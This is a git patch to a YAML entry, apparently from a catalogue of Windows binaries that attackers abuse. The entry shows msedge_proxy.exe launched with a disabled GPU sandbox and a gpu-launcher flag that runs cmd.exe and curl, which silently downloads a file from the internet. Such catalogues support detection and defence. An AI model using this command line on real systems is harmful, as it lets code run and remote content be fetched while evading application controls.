From a0874f2bb73bcfe27b2cd657e413e40c9d785a01 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Mert=20Da=C5=9F?= <48562581+mertdas@users.noreply.github.com> Date: Sun, 3 Sep 2023 21:48:05 +0300 Subject: [PATCH] Update msedge_proxy.yml --- yml/OSBinaries/msedge_proxy.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/msedge_proxy.yml b/yml/OSBinaries/msedge_proxy.yml index ff073e1..95a0e80 100644 --- a/yml/OSBinaries/msedge_proxy.yml +++ b/yml/OSBinaries/msedge_proxy.yml @@ -11,7 +11,7 @@ Commands: Privileges: User MitreID: T1105 OperatingSystem: Windows 10, Windows 11 - - Command: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c curl http://example.com:8001/test.txt --output C:\Users\User\Desktop\test.txt &&" + - Command: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\Windows\System32\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&" Description: Edge will silently download the file. Usecase: Download file from the internet Category: Download